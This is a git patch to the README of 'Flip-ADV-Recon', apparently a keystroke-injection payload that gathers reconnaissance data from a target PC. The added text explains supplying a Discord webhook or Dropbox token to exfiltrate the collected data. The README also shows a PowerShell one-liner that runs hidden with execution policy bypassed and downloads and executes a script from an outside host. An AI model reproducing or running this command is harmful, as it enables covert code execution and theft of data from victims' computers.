From 3f05350a29adb4b02390f1b67af866a59689c111 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Sun, 18 Dec 2022 16:26:34 -0600 Subject: [PATCH] Update README.md --- Payloads/Flip-ADV-Recon/README.md | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/Payloads/Flip-ADV-Recon/README.md b/Payloads/Flip-ADV-Recon/README.md index 2cc8a44..8c7219b 100644 --- a/Payloads/Flip-ADV-Recon/README.md +++ b/Payloads/Flip-ADV-Recon/README.md @@ -55,6 +55,13 @@ This program enumerates a target PC to collect as much recon data as possible fo * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory + +`$dc` is the variable that stores your discord webhook + +`$db` is the variable that stores your dropbox token + +Fill in either or both of these to methods to exfil your collected data + ``` powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr jakoby.lol/aucrjmf | iex ```